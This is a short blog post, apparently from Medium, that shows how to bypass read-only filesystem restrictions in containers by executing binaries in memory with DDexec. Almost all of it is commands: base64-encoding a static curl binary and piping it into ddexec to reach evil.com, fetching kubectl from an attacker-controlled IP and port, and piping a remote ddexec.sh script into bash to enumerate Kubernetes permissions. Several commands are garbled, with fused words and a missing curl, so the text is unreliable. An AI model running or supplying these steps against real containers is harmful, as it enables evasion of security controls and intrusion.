Bypassing read only filesystem(ro) restriction containers - inmemory execution

  1. These programs should be available in container image-
dd
bash | zsh | ash (busybox)
setarch | linux64 (busybox)
head
tail
cut
grep
od
readlink
wc
tr
base64
sleep
docker run --security-opt seccomp=unconfined --read-only -it ubuntu
wget https://github.com/moparisthebest/static-curl/releases/download/v7.82.0/curl-amd64 && mv curl-amd64 curlbase64 -w0 ./curl > curl.b64
$ ddexec()
> {
> # Copy and Paste the ddexec.sh script as it is.
> }
echo -n "<b64 encoded curl binary>" | ddexec /bin/curl evil.com
curl -sk "http://<>kubectl.b64>" | ddexec /bin/kubectl auth can-i --list
curl -sk "http://<IP>:<PORT>/<kubectl.b64>" | bash <(https://raw.githubusercontent.com/arget13/DDexec/main/ddexec.sh) /bin/kubectl auth can-i --list

--

--

--

Geekđź‘ľ. Tries to understand how computers work. Would love to hear your suggestions and feedbacks. https://www.linkedin.com/in/pswalia2u/

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Spacemesh 2020 Update

The problem with CVEs

Developing a Team Project vs. Flying Solo

What is the “serverless framework

Supposedly a server-LESS :)

[Series] DevOps and Telco Softwarisation

A Comprehensive Guide To App Development Cost Breakdown

Prometheus: Apdex alerting

Debugging Smart Contracts with Truffle Debugger: A Practical Approach

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
n00🔑

n00🔑

Geekđź‘ľ. Tries to understand how computers work. Would love to hear your suggestions and feedbacks. https://www.linkedin.com/in/pswalia2u/

More from Medium

Monitor your Raspberry Pi using Grafana Cloud

Install Kubernetes on X96 Max+

BETTER SERVICE DISCOVERY

Setup Multi Node Kubernetes Cluster in Ubuntu Linux